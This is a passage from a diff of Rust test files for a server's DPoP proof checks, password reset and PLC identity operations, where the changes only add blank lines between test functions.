assert!(!nonce2.is_empty());
1364
}
1365
+
1366
#[test]
1367
fn test_dpop_nonce_validation_success() {
1368
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1371
let result = verifier.validate_nonce(&nonce);
1372
assert!(result.is_ok(), "Valid nonce should pass: {:?}", result);
1373
}
1374
+
1375
#[test]
1376
fn test_dpop_nonce_wrong_secret() {
1377
let secret1 = b"test-dpop-secret-32-bytes-long!!";
···
1382
let result = verifier2.validate_nonce(&nonce);
1383
assert!(result.is_err(), "Nonce from different secret should fail");
1384
}
1385
+
1386
#[test]
1387
fn test_dpop_nonce_invalid_format() {
1388
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1391
assert!(verifier.validate_nonce("").is_err());
1392
assert!(verifier.validate_nonce("!!!not-base64!!!").is_err());
1393
}
1394
+
1395
#[test]
1396
fn test_jwk_thumbprint_ec_p256() {
1397
let jwk = DPoPJwk {
···
1406
assert!(!tp.is_empty());
1407
assert!(tp.chars().all(|c| c.is_alphanumeric() || c == '-' || c == '_'));
1408
}
1409
+
1410
#[test]
1411
fn test_jwk_thumbprint_ec_secp256k1() {
1412
let jwk = DPoPJwk {
···
1418
let thumbprint = compute_jwk_thumbprint(&jwk);
1419
assert!(thumbprint.is_ok());
1420
}
1421
+
1422
#[test]
1423
fn test_jwk_thumbprint_okp_ed25519() {
1424
let jwk = DPoPJwk {
···
1430
let thumbprint = compute_jwk_thumbprint(&jwk);
1431
assert!(thumbprint.is_ok());
1432
}
1433
+
1434
#[test]
1435
fn test_jwk_thumbprint_missing_crv() {
1436
let jwk = DPoPJwk {
···
1442
let thumbprint = compute_jwk_thumbprint(&jwk);
1443
assert!(thumbprint.is_err());
1444
}
1445
+
1446
#[test]
1447
fn test_jwk_thumbprint_missing_x() {
1448
let jwk = DPoPJwk {
···
1454
let thumbprint = compute_jwk_thumbprint(&jwk);
1455
assert!(thumbprint.is_err());
1456
}
1457
+
1458
#[test]
1459
fn test_jwk_thumbprint_missing_y_for_ec() {
1460
let jwk = DPoPJwk {
···
1466
let thumbprint = compute_jwk_thumbprint(&jwk);
1467
assert!(thumbprint.is_err());
1468
}
1469
+
1470
#[test]
1471
fn test_jwk_thumbprint_unsupported_key_type() {
1472
let jwk = DPoPJwk {
···
1478
let thumbprint = compute_jwk_thumbprint(&jwk);
1479
assert!(thumbprint.is_err());
1480
}
1481
+
1482
#[test]
1483
fn test_jwk_thumbprint_deterministic() {
1484
let jwk = DPoPJwk {
···
1491
let tp2 = compute_jwk_thumbprint(&jwk).unwrap();
1492
assert_eq!(tp1, tp2, "Thumbprint should be deterministic");
1493
}
1494
+
1495
#[test]
1496
fn test_dpop_proof_invalid_format() {
1497
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1501
let result = verifier.verify_proof("invalid", "POST", "https://example.com", None);
1502
assert!(result.is_err());
1503
}
1504
+
1505
#[test]
1506
fn test_dpop_proof_invalid_typ() {
1507
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1528
let result = verifier.verify_proof(&proof, "POST", "https://example.com", None);
1529
assert!(result.is_err());
1530
}
1531
+
1532
#[test]
1533
fn test_dpop_proof_method_mismatch() {
1534
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1537
let result = verifier.verify_proof(&proof, "GET", "https://example.com/token", None);
1538
assert!(result.is_err());
1539
}
1540
+
1541
#[test]
1542
fn test_dpop_proof_uri_mismatch() {
1543
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1546
let result = verifier.verify_proof(&proof, "POST", "https://other.com/token", None);
1547
assert!(result.is_err());
1548
}
1549
+
1550
#[test]
1551
fn test_dpop_proof_iat_too_old() {
1552
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1555
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1556
assert!(result.is_err());
1557
}
1558
+
1559
#[test]
1560
fn test_dpop_proof_iat_future() {
1561
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1564
let result = verifier.verify_proof(&proof, "POST", "https://example.com/token", None);
1565
assert!(result.is_err());
1566
}
1567
+
1568
#[test]
1569
fn test_dpop_proof_ath_mismatch() {
1570
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1584
);
1585
assert!(result.is_err());
1586
}
1587
+
1588
#[test]
1589
fn test_dpop_proof_missing_ath_when_required() {
1590
let secret = b"test-dpop-secret-32-bytes-long!!";
···
1598
);
1599
assert!(result.is_err());
1600
}
1601
+
1602
#[test]
1603
fn test_dpop_proof_uri_ignores_query_params() {
1604
let secret = b"test-dpop-secret-32-bytes-long!!";
+9
tests/password_reset.rs
+9
tests/password_reset.rs
···
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
use helpers::verify_new_account;
7
async fn get_pool() -> PgPool {
8
let conn_str = common::get_db_connection_string().await;
9
sqlx::postgres::PgPoolOptions::new()
···
12
.await
13
.expect("Failed to connect to test database")
14
}
15
#[tokio::test]
16
async fn test_request_password_reset_creates_code() {
17
let client = common::client();
···
51
assert!(code.contains('-'));
52
assert_eq!(code.len(), 11);
53
}
54
#[tokio::test]
55
async fn test_request_password_reset_unknown_email_returns_ok() {
56
let client = common::client();
···
63
.expect("Failed to request password reset");
64
assert_eq!(res.status(), StatusCode::OK);
65
}
66
#[tokio::test]
67
async fn test_reset_password_with_valid_token() {
68
let client = common::client();
···
142
.expect("Failed to login attempt");
143
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
144
}
145
#[tokio::test]
146
async fn test_reset_password_with_invalid_token() {
147
let client = common::client();
···
159
let body: Value = res.json().await.expect("Invalid JSON");
160
assert_eq!(body["error"], "InvalidToken");
161
}
162
#[tokio::test]
163
async fn test_reset_password_with_expired_token() {
164
let client = common::client();
···
213
let body: Value = res.json().await.expect("Invalid JSON");
214
assert_eq!(body["error"], "ExpiredToken");
215
}
216
#[tokio::test]
217
async fn test_reset_password_invalidates_sessions() {
218
let client = common::client();
···
275
.expect("Failed to get session");
276
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
277
}
278
#[tokio::test]
279
async fn test_request_password_reset_empty_email() {
280
let client = common::client();
···
289
let body: Value = res.json().await.expect("Invalid JSON");
290
assert_eq!(body["error"], "InvalidRequest");
291
}
292
#[tokio::test]
293
async fn test_reset_password_creates_notification() {
294
let pool = get_pool().await;
···
4
use serde_json::{json, Value};
5
use sqlx::PgPool;
6
use helpers::verify_new_account;
7
+
8
async fn get_pool() -> PgPool {
9
let conn_str = common::get_db_connection_string().await;
10
sqlx::postgres::PgPoolOptions::new()
···
13
.await
14
.expect("Failed to connect to test database")
15
}
16
+
17
#[tokio::test]
18
async fn test_request_password_reset_creates_code() {
19
let client = common::client();
···
53
assert!(code.contains('-'));
54
assert_eq!(code.len(), 11);
55
}
56
+
57
#[tokio::test]
58
async fn test_request_password_reset_unknown_email_returns_ok() {
59
let client = common::client();
···
66
.expect("Failed to request password reset");
67
assert_eq!(res.status(), StatusCode::OK);
68
}
69
+
70
#[tokio::test]
71
async fn test_reset_password_with_valid_token() {
72
let client = common::client();
···
146
.expect("Failed to login attempt");
147
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
148
}
149
+
150
#[tokio::test]
151
async fn test_reset_password_with_invalid_token() {
152
let client = common::client();
···
164
let body: Value = res.json().await.expect("Invalid JSON");
165
assert_eq!(body["error"], "InvalidToken");
166
}
167
+
168
#[tokio::test]
169
async fn test_reset_password_with_expired_token() {
170
let client = common::client();
···
219
let body: Value = res.json().await.expect("Invalid JSON");
220
assert_eq!(body["error"], "ExpiredToken");
221
}
222
+
223
#[tokio::test]
224
async fn test_reset_password_invalidates_sessions() {
225
let client = common::client();
···
282
.expect("Failed to get session");
283
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
284
}
285
+
286
#[tokio::test]
287
async fn test_request_password_reset_empty_email() {
288
let client = common::client();
···
297
let body: Value = res.json().await.expect("Invalid JSON");
298
assert_eq!(body["error"], "InvalidRequest");
299
}
300
+
301
#[tokio::test]
302
async fn test_reset_password_creates_notification() {
303
let pool = get_pool().await;
+20
tests/plc_migration.rs
+20
tests/plc_migration.rs
···
6
use sqlx::PgPool;
7
use wiremock::matchers::{method, path};
8
use wiremock::{Mock, MockServer, ResponseTemplate};
9
fn encode_uvarint(mut x: u64) -> Vec<u8> {
10
let mut out = Vec::new();
11
while x >= 0x80 {
···
15
out.push(x as u8);
16
out
17
}
18
fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
19
let verifying_key = signing_key.verifying_key();
20
let point = verifying_key.to_encoded_point(true);
···
24
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
25
format!("did:key:{}", encoded)
26
}
27
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
28
let public_key = signing_key.verifying_key();
29
let compressed = public_key.to_sec1_bytes();
···
31
buf.extend_from_slice(&compressed);
32
multibase::encode(multibase::Base::Base58Btc, buf)
33
}
34
async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
35
let db_url = get_db_connection_string().await;
36
let pool = PgPool::connect(&db_url).await.ok()?;
···
48
.ok()??;
49
bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok()
50
}
51
async fn get_plc_token_from_db(did: &str) -> Option<String> {
52
let db_url = get_db_connection_string().await;
53
let pool = PgPool::connect(&db_url).await.ok()?;
···
64
.await
65
.ok()?
66
}
67
async fn get_user_handle(did: &str) -> Option<String> {
68
let db_url = get_db_connection_string().await;
69
let pool = PgPool::connect(&db_url).await.ok()?;
···
75
.await
76
.ok()?
77
}
78
fn create_mock_last_op(
79
_did: &str,
80
handle: &str,
···
99
"sig": "mock_signature_for_testing"
100
})
101
}
102
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value {
103
let multikey = get_multikey_from_signing_key(signing_key);
104
json!({
···
121
}]
122
})
123
}
124
async fn setup_mock_plc_for_sign(
125
did: &str,
126
handle: &str,
···
137
.await;
138
mock_server
139
}
140
async fn setup_mock_plc_for_submit(
141
did: &str,
142
handle: &str,
···
158
.await;
159
mock_server
160
}
161
#[tokio::test]
162
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
163
async fn test_full_plc_operation_flow() {
···
213
assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation"));
214
assert!(operation.get("prev").is_some(), "Operation should have prev reference");
215
}
216
#[tokio::test]
217
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
218
async fn test_sign_plc_operation_consumes_token() {
···
278
"Error should indicate invalid/expired token"
279
);
280
}
281
#[tokio::test]
282
async fn test_sign_plc_operation_with_custom_fields() {
283
let client = client();
···
337
assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases");
338
assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys");
339
}
340
#[tokio::test]
341
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
342
async fn test_submit_plc_operation_success() {
···
390
submit_body
391
);
392
}
393
#[tokio::test]
394
async fn test_submit_plc_operation_wrong_endpoint_rejected() {
395
let client = client();
···
441
let body: Value = submit_res.json().await.unwrap();
442
assert_eq!(body["error"], "InvalidRequest");
443
}
444
#[tokio::test]
445
async fn test_submit_plc_operation_wrong_signing_key_rejected() {
446
let client = client();
···
494
let body: Value = submit_res.json().await.unwrap();
495
assert_eq!(body["error"], "InvalidRequest");
496
}
497
#[tokio::test]
498
async fn test_full_sign_and_submit_flow() {
499
let client = client();
···
593
submit_body
594
);
595
}
596
#[tokio::test]
597
async fn test_cross_pds_migration_with_records() {
598
let client = client();
···
692
"Record content should match"
693
);
694
}
695
#[tokio::test]
696
async fn test_migration_rejects_wrong_did_document() {
697
let client = client();
···
749
"Error should mention signature verification failure"
750
);
751
}
752
#[tokio::test]
753
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
754
async fn test_full_migration_flow_end_to_end() {
···
6
use sqlx::PgPool;
7
use wiremock::matchers::{method, path};
8
use wiremock::{Mock, MockServer, ResponseTemplate};
9
+
10
fn encode_uvarint(mut x: u64) -> Vec<u8> {
11
let mut out = Vec::new();
12
while x >= 0x80 {
···
16
out.push(x as u8);
17
out
18
}
19
+
20
fn signing_key_to_did_key(signing_key: &SigningKey) -> String {
21
let verifying_key = signing_key.verifying_key();
22
let point = verifying_key.to_encoded_point(true);
···
26
let encoded = multibase::encode(multibase::Base::Base58Btc, &prefixed);
27
format!("did:key:{}", encoded)
28
}
29
+
30
fn get_multikey_from_signing_key(signing_key: &SigningKey) -> String {
31
let public_key = signing_key.verifying_key();
32
let compressed = public_key.to_sec1_bytes();
···
34
buf.extend_from_slice(&compressed);
35
multibase::encode(multibase::Base::Base58Btc, buf)
36
}
37
+
38
async fn get_user_signing_key(did: &str) -> Option<Vec<u8>> {
39
let db_url = get_db_connection_string().await;
40
let pool = PgPool::connect(&db_url).await.ok()?;
···
52
.ok()??;
53
bspds::config::decrypt_key(&row.key_bytes, row.encryption_version).ok()
54
}
55
+
56
async fn get_plc_token_from_db(did: &str) -> Option<String> {
57
let db_url = get_db_connection_string().await;
58
let pool = PgPool::connect(&db_url).await.ok()?;
···
69
.await
70
.ok()?
71
}
72
+
73
async fn get_user_handle(did: &str) -> Option<String> {
74
let db_url = get_db_connection_string().await;
75
let pool = PgPool::connect(&db_url).await.ok()?;
···
81
.await
82
.ok()?
83
}
84
+
85
fn create_mock_last_op(
86
_did: &str,
87
handle: &str,
···
106
"sig": "mock_signature_for_testing"
107
})
108
}
109
+
110
fn create_did_document(did: &str, handle: &str, signing_key: &SigningKey, pds_endpoint: &str) -> Value {
111
let multikey = get_multikey_from_signing_key(signing_key);
112
json!({
···
129
}]
130
})
131
}
132
+
133
async fn setup_mock_plc_for_sign(
134
did: &str,
135
handle: &str,
···
146
.await;
147
mock_server
148
}
149
+
150
async fn setup_mock_plc_for_submit(
151
did: &str,
152
handle: &str,
···
168
.await;
169
mock_server
170
}
171
+
172
#[tokio::test]
173
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
174
async fn test_full_plc_operation_flow() {
···
224
assert_eq!(operation.get("type").and_then(|v| v.as_str()), Some("plc_operation"));
225
assert!(operation.get("prev").is_some(), "Operation should have prev reference");
226
}
227
+
228
#[tokio::test]
229
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
230
async fn test_sign_plc_operation_consumes_token() {
···
290
"Error should indicate invalid/expired token"
291
);
292
}
293
+
294
#[tokio::test]
295
async fn test_sign_plc_operation_with_custom_fields() {
296
let client = client();
···
350
assert_eq!(also_known_as.unwrap().len(), 2, "Should have 2 aliases");
351
assert_eq!(rotation_keys.unwrap().len(), 2, "Should have 2 rotation keys");
352
}
353
+
354
#[tokio::test]
355
#[ignore = "requires mock PLC server setup that is flaky; run manually with --ignored"]
356
async fn test_submit_plc_operation_success() {
···
404
submit_body
405
);
406
}
407
+
408
#[tokio::test]
409
async fn test_submit_plc_operation_wrong_endpoint_rejected() {
410
let client = client();
···
456
let body: Value = submit_res.json().await.unwrap();
457
assert_eq!(body["error"], "InvalidRequest");
458
}
459
+
460
#[tokio::test]
461
async fn test_submit_plc_operation_wrong_signing_key_rejected() {
462
let client = client();
···
510
let body: Value = submit_res.json().await.unwrap();
511
assert_eq!(body["error"], "InvalidRequest");
512
}
513
+
514
#[tokio::test]
515
async fn test_full_sign_and_submit_flow() {
516
let client = client();
···
610
submit_body
611
);
612
}
613
+
614
#[tokio::test]
615
async fn test_cross_pds_migration_with_records() {
616
let client = client();
···
710
"Record content should match"
711
);
712
}
713
+
714
#[tokio::test]
715
async fn test_migration_rejects_wrong_did_document() {
716
let client = client();
···
768
"Error should mention signature verification failure"
769
);
770
}
771
+
772
#[tokio::test]
773
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
774
async fn test_full_migration_flow_end_to_end() {
+15
tests/plc_operations.rs
+15
tests/plc_operations.rs
···
3
use reqwest::StatusCode;
4
use serde_json::json;
5
use sqlx::PgPool;
6
#[tokio::test]
7
async fn test_request_plc_operation_signature_requires_auth() {
8
let client = client();
···
16
.expect("Request failed");
17
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
18
}
19
#[tokio::test]
20
async fn test_request_plc_operation_signature_success() {
21
let client = client();
···
31
.expect("Request failed");
32
assert_eq!(res.status(), StatusCode::OK);
33
}
34
#[tokio::test]
35
async fn test_sign_plc_operation_requires_auth() {
36
let client = client();
···
45
.expect("Request failed");
46
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
47
}
48
#[tokio::test]
49
async fn test_sign_plc_operation_requires_token() {
50
let client = client();
···
63
let body: serde_json::Value = res.json().await.unwrap();
64
assert_eq!(body["error"], "InvalidRequest");
65
}
66
#[tokio::test]
67
async fn test_sign_plc_operation_invalid_token() {
68
let client = client();
···
83
let body: serde_json::Value = res.json().await.unwrap();
84
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
85
}
86
#[tokio::test]
87
async fn test_submit_plc_operation_requires_auth() {
88
let client = client();
···
99
.expect("Request failed");
100
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
101
}
102
#[tokio::test]
103
async fn test_submit_plc_operation_invalid_operation() {
104
let client = client();
···
121
let body: serde_json::Value = res.json().await.unwrap();
122
assert_eq!(body["error"], "InvalidRequest");
123
}
124
#[tokio::test]
125
async fn test_submit_plc_operation_missing_sig() {
126
let client = client();
···
148
let body: serde_json::Value = res.json().await.unwrap();
149
assert_eq!(body["error"], "InvalidRequest");
150
}
151
#[tokio::test]
152
async fn test_submit_plc_operation_wrong_service_endpoint() {
153
let client = client();
···
179
.expect("Request failed");
180
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
181
}
182
#[tokio::test]
183
async fn test_request_plc_operation_creates_token_in_db() {
184
let client = client();
···
213
assert!(row.token.contains('-'), "Token should contain hyphen");
214
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
215
}
216
#[tokio::test]
217
async fn test_request_plc_operation_replaces_existing_token() {
218
let client = client();
···
278
.expect("Count query failed");
279
assert_eq!(count, 1, "Should only have one token per user");
280
}
281
#[tokio::test]
282
async fn test_submit_plc_operation_wrong_verification_method() {
283
let client = client();
···
321
body
322
);
323
}
324
#[tokio::test]
325
async fn test_submit_plc_operation_wrong_handle() {
326
let client = client();
···
357
let body: serde_json::Value = res.json().await.unwrap();
358
assert_eq!(body["error"], "InvalidRequest");
359
}
360
#[tokio::test]
361
async fn test_submit_plc_operation_wrong_service_type() {
362
let client = client();
···
393
let body: serde_json::Value = res.json().await.unwrap();
394
assert_eq!(body["error"], "InvalidRequest");
395
}
396
#[tokio::test]
397
async fn test_plc_token_expiry_format() {
398
let client = client();
···
3
use reqwest::StatusCode;
4
use serde_json::json;
5
use sqlx::PgPool;
6
+
7
#[tokio::test]
8
async fn test_request_plc_operation_signature_requires_auth() {
9
let client = client();
···
17
.expect("Request failed");
18
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
19
}
20
+
21
#[tokio::test]
22
async fn test_request_plc_operation_signature_success() {
23
let client = client();
···
33
.expect("Request failed");
34
assert_eq!(res.status(), StatusCode::OK);
35
}
36
+
37
#[tokio::test]
38
async fn test_sign_plc_operation_requires_auth() {
39
let client = client();
···
48
.expect("Request failed");
49
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
50
}
51
+
52
#[tokio::test]
53
async fn test_sign_plc_operation_requires_token() {
54
let client = client();
···
67
let body: serde_json::Value = res.json().await.unwrap();
68
assert_eq!(body["error"], "InvalidRequest");
69
}
70
+
71
#[tokio::test]
72
async fn test_sign_plc_operation_invalid_token() {
73
let client = client();
···
88
let body: serde_json::Value = res.json().await.unwrap();
89
assert!(body["error"] == "InvalidToken" || body["error"] == "ExpiredToken");
90
}
91
+
92
#[tokio::test]
93
async fn test_submit_plc_operation_requires_auth() {
94
let client = client();
···
105
.expect("Request failed");
106
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
107
}
108
+
109
#[tokio::test]
110
async fn test_submit_plc_operation_invalid_operation() {
111
let client = client();
···
128
let body: serde_json::Value = res.json().await.unwrap();
129
assert_eq!(body["error"], "InvalidRequest");
130
}
131
+
132
#[tokio::test]
133
async fn test_submit_plc_operation_missing_sig() {
134
let client = client();
···
156
let body: serde_json::Value = res.json().await.unwrap();
157
assert_eq!(body["error"], "InvalidRequest");
158
}
159
+
160
#[tokio::test]
161
async fn test_submit_plc_operation_wrong_service_endpoint() {
162
let client = client();
···
188
.expect("Request failed");
189
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
190
}
191
+
192
#[tokio::test]
193
async fn test_request_plc_operation_creates_token_in_db() {
194
let client = client();
···
223
assert!(row.token.contains('-'), "Token should contain hyphen");
224
assert!(row.expires_at > chrono::Utc::now(), "Token should not be expired");
225
}
226
+
227
#[tokio::test]
228
async fn test_request_plc_operation_replaces_existing_token() {
229
let client = client();
···
289
.expect("Count query failed");
290
assert_eq!(count, 1, "Should only have one token per user");
291
}
292
+
293
#[tokio::test]
294
async fn test_submit_plc_operation_wrong_verification_method() {
295
let client = client();
···
333
body
334
);
335
}
336
+
337
#[tokio::test]
338
async fn test_submit_plc_operation_wrong_handle() {
339
let client = client();
···
370
let body: serde_json::Value = res.json().await.unwrap();
371
assert_eq!(body["error"], "InvalidRequest");
372
}
373
+
374
#[tokio::test]
375
async fn test_submit_plc_operation_wrong_service_type() {
376
let client = client();
···
407
let body: serde_json::Value = res.json().await.unwrap();
408
assert_eq!(body["error"], "InvalidRequest");
409
}
410
+
411
#[tokio::test]
412
async fn test_plc_token_expiry_format() {
413
let client = client();
+29
tests/plc_validation.rs
+29
tests/plc_validation.rs
···
7
use k256::ecdsa::SigningKey;
8
use serde_json::json;
9
use std::collections::HashMap;
10
fn create_valid_operation() -> serde_json::Value {
11
let key = SigningKey::random(&mut rand::thread_rng());
12
let did_key = signing_key_to_did_key(&key);
···
27
});
28
sign_operation(&op, &key).unwrap()
29
}
30
#[test]
31
fn test_validate_plc_operation_valid() {
32
let op = create_valid_operation();
33
let result = validate_plc_operation(&op);
34
assert!(result.is_ok());
35
}
36
#[test]
37
fn test_validate_plc_operation_missing_type() {
38
let op = json!({
···
45
let result = validate_plc_operation(&op);
46
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
47
}
48
#[test]
49
fn test_validate_plc_operation_invalid_type() {
50
let op = json!({
···
54
let result = validate_plc_operation(&op);
55
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
56
}
57
#[test]
58
fn test_validate_plc_operation_missing_sig() {
59
let op = json!({
···
66
let result = validate_plc_operation(&op);
67
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
68
}
69
#[test]
70
fn test_validate_plc_operation_missing_rotation_keys() {
71
let op = json!({
···
78
let result = validate_plc_operation(&op);
79
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
80
}
81
#[test]
82
fn test_validate_plc_operation_missing_verification_methods() {
83
let op = json!({
···
90
let result = validate_plc_operation(&op);
91
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
92
}
93
#[test]
94
fn test_validate_plc_operation_missing_also_known_as() {
95
let op = json!({
···
102
let result = validate_plc_operation(&op);
103
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
104
}
105
#[test]
106
fn test_validate_plc_operation_missing_services() {
107
let op = json!({
···
114
let result = validate_plc_operation(&op);
115
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
116
}
117
#[test]
118
fn test_validate_rotation_key_required() {
119
let key = SigningKey::random(&mut rand::thread_rng());
···
141
let result = validate_plc_operation_for_submission(&op, &ctx);
142
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
143
}
144
#[test]
145
fn test_validate_signing_key_match() {
146
let key = SigningKey::random(&mut rand::thread_rng());
···
168
let result = validate_plc_operation_for_submission(&op, &ctx);
169
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
170
}
171
#[test]
172
fn test_validate_handle_match() {
173
let key = SigningKey::random(&mut rand::thread_rng());
···
194
let result = validate_plc_operation_for_submission(&op, &ctx);
195
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
196
}
197
#[test]
198
fn test_validate_pds_service_type() {
199
let key = SigningKey::random(&mut rand::thread_rng());
···
220
let result = validate_plc_operation_for_submission(&op, &ctx);
221
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
222
}
223
#[test]
224
fn test_validate_pds_endpoint_match() {
225
let key = SigningKey::random(&mut rand::thread_rng());
···
246
let result = validate_plc_operation_for_submission(&op, &ctx);
247
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
248
}
249
#[test]
250
fn test_verify_signature_secp256k1() {
251
let key = SigningKey::random(&mut rand::thread_rng());
···
264
assert!(result.is_ok());
265
assert!(result.unwrap());
266
}
267
#[test]
268
fn test_verify_signature_wrong_key() {
269
let key = SigningKey::random(&mut rand::thread_rng());
···
283
assert!(result.is_ok());
284
assert!(!result.unwrap());
285
}
286
#[test]
287
fn test_verify_signature_invalid_did_key_format() {
288
let key = SigningKey::random(&mut rand::thread_rng());
···
300
assert!(result.is_ok());
301
assert!(!result.unwrap());
302
}
303
#[test]
304
fn test_tombstone_validation() {
305
let op = json!({
···
310
let result = validate_plc_operation(&op);
311
assert!(result.is_ok());
312
}
313
#[test]
314
fn test_cid_for_cbor_deterministic() {
315
let value = json!({
···
321
assert_eq!(cid1, cid2, "CID generation should be deterministic");
322
assert!(cid1.starts_with("bafyrei"), "CID should start with bafyrei (dag-cbor + sha256)");
323
}
324
#[test]
325
fn test_cid_different_for_different_data() {
326
let value1 = json!({"data": 1});
···
329
let cid2 = cid_for_cbor(&value2).unwrap();
330
assert_ne!(cid1, cid2, "Different data should produce different CIDs");
331
}
332
#[test]
333
fn test_signing_key_to_did_key_format() {
334
let key = SigningKey::random(&mut rand::thread_rng());
···
336
assert!(did_key.starts_with("did:key:z"), "Should start with did:key:z");
337
assert!(did_key.len() > 50, "Did key should be reasonably long");
338
}
339
#[test]
340
fn test_signing_key_to_did_key_unique() {
341
let key1 = SigningKey::random(&mut rand::thread_rng());
···
344
let did2 = signing_key_to_did_key(&key2);
345
assert_ne!(did1, did2, "Different keys should produce different did:keys");
346
}
347
#[test]
348
fn test_signing_key_to_did_key_consistent() {
349
let key = SigningKey::random(&mut rand::thread_rng());
···
351
let did2 = signing_key_to_did_key(&key);
352
assert_eq!(did1, did2, "Same key should produce same did:key");
353
}
354
#[test]
355
fn test_sign_operation_removes_existing_sig() {
356
let key = SigningKey::random(&mut rand::thread_rng());
···
367
let new_sig = signed.get("sig").and_then(|v| v.as_str()).unwrap();
368
assert_ne!(new_sig, "old_signature", "Should replace old signature");
369
}
370
#[test]
371
fn test_validate_plc_operation_not_object() {
372
let result = validate_plc_operation(&json!("not an object"));
373
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
374
}
375
#[test]
376
fn test_validate_for_submission_tombstone_passes() {
377
let key = SigningKey::random(&mut rand::thread_rng());
···
390
let result = validate_plc_operation_for_submission(&op, &ctx);
391
assert!(result.is_ok(), "Tombstone should pass submission validation");
392
}
393
#[test]
394
fn test_verify_signature_missing_sig() {
395
let op = json!({
···
402
let result = verify_operation_signature(&op, &[]);
403
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
404
}
405
#[test]
406
fn test_verify_signature_invalid_base64() {
407
let op = json!({
···
415
let result = verify_operation_signature(&op, &[]);
416
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
417
}
418
#[test]
419
fn test_plc_operation_struct() {
420
let mut services = HashMap::new();
···
7
use k256::ecdsa::SigningKey;
8
use serde_json::json;
9
use std::collections::HashMap;
10
+
11
fn create_valid_operation() -> serde_json::Value {
12
let key = SigningKey::random(&mut rand::thread_rng());
13
let did_key = signing_key_to_did_key(&key);
···
28
});
29
sign_operation(&op, &key).unwrap()
30
}
31
+
32
#[test]
33
fn test_validate_plc_operation_valid() {
34
let op = create_valid_operation();
35
let result = validate_plc_operation(&op);
36
assert!(result.is_ok());
37
}
38
+
39
#[test]
40
fn test_validate_plc_operation_missing_type() {
41
let op = json!({
···
48
let result = validate_plc_operation(&op);
49
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
50
}
51
+
52
#[test]
53
fn test_validate_plc_operation_invalid_type() {
54
let op = json!({
···
58
let result = validate_plc_operation(&op);
59
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
60
}
61
+
62
#[test]
63
fn test_validate_plc_operation_missing_sig() {
64
let op = json!({
···
71
let result = validate_plc_operation(&op);
72
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
73
}
74
+
75
#[test]
76
fn test_validate_plc_operation_missing_rotation_keys() {
77
let op = json!({
···
84
let result = validate_plc_operation(&op);
85
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
86
}
87
+
88
#[test]
89
fn test_validate_plc_operation_missing_verification_methods() {
90
let op = json!({
···
97
let result = validate_plc_operation(&op);
98
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
99
}
100
+
101
#[test]
102
